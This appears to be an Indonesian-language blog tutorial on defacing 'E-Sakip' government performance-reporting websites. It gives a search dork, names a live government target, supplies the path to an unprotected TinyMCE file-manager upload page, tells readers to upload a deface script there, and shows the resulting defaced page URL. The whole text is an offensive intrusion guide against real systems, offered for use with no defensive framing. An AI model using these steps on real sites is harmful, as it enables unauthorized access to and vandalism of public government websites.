Download Aplikasi DroidSQLI Mods v1.0

 Assalamualaikum kali ini gua akan materi Deface Poc E-Sakip File manager

Ok langsung saja kita siap kan bahan nya

Bahan :

-Dork:inurl:/portal/home/kontak_view

-kopi

-Sc Deface

Langsung saja ke tutor

Seperti biasa pertama lu ngedork dulu dgn memakai dork yg gua kasih klo lu males ngedork nih live target

https://e-sakip.bontangkota.go.id/portal/home

Ok kalo udah skrg tggl lu tambahin exploit dibelakang domain webnya yaitu go.id 

 

Exploit: plugins/tinymce/js/tinymce/plugins/filemanager/dialog.php

Contoh? 

https://e-sakip.bontangkota.go.id/plugins/tinymce/js/tinymce/plugins/filemanager/dialog.php

Nah kalo vuln bakal ada tmpt up kayak gini 

Oke kyk gitu ya tampilan nya,dibagian tempat upload diatas tuh kalian tekan,nah lalu kalian up sc deface kesayangan kalian,, kalau berhasil maka akan seperti ini 

nah sekarang tinggal di akses,nah cara akses nya gimana? www.target.go.id/uploads/nama sc lu.html

Contoh hasil nya? 

https://e-sakip.bontangkota.go.id/uploads/bombercyberarmy.html

Oke sekian materi dari gua dan semoga bermanfaat